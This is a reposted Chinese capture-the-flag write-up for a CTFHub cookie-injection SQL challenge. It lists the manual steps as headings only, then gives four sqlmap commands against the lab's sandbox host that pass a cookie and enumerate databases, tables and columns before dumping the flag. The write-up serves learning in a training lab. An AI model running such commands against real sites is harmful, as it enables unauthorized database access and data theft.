手注

打開靶機

查看頁面信息

查找cookie

測試是否為cookie注入

抓包

嘗試注入

成功查詢到數據庫名

查詢表名

查詢字段名

查詢字段信息

成功拿到flag

sqlmap

查詢數據庫名

python2 sqlmap.py -u "http://challenge-e27e712ceeb91bac.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 --dbs

查詢數據表名

python2 sqlmap.py -u "http://challenge-e27e712ceeb91bac.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 -D sqli --tables

查詢字段名

python2 sqlmap.py -u "http://challenge-e27e712ceeb91bac.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 -D sqli -T mwlhneimpy --columns

查詢字段信息

python2 sqlmap.py -u "http://challenge-e27e712ceeb91bac.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 -D sqli -T mwlhneimpy -C pbsbpdhlmf --dump

成功拿到flag

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 ctfhub技能樹—sql注入—Refer注入 ctfhub技能樹—sql注入—UA注入 ctfhub技能樹—sql注入—過濾空格 ctfhub技能樹—sql注入—整數型注入 ctfhub技能樹—RCE—命令注入 ctfhub技能樹—web前置技能—http協議—Cookie CTFHub web技能樹之RCE初步命令注入+過濾cat CTFHub Web技能樹 CTFHUB技能樹學習之SSRF CTFHub題解-技能樹-Web-RCE【命令注入、過濾cat、過濾空格】(一)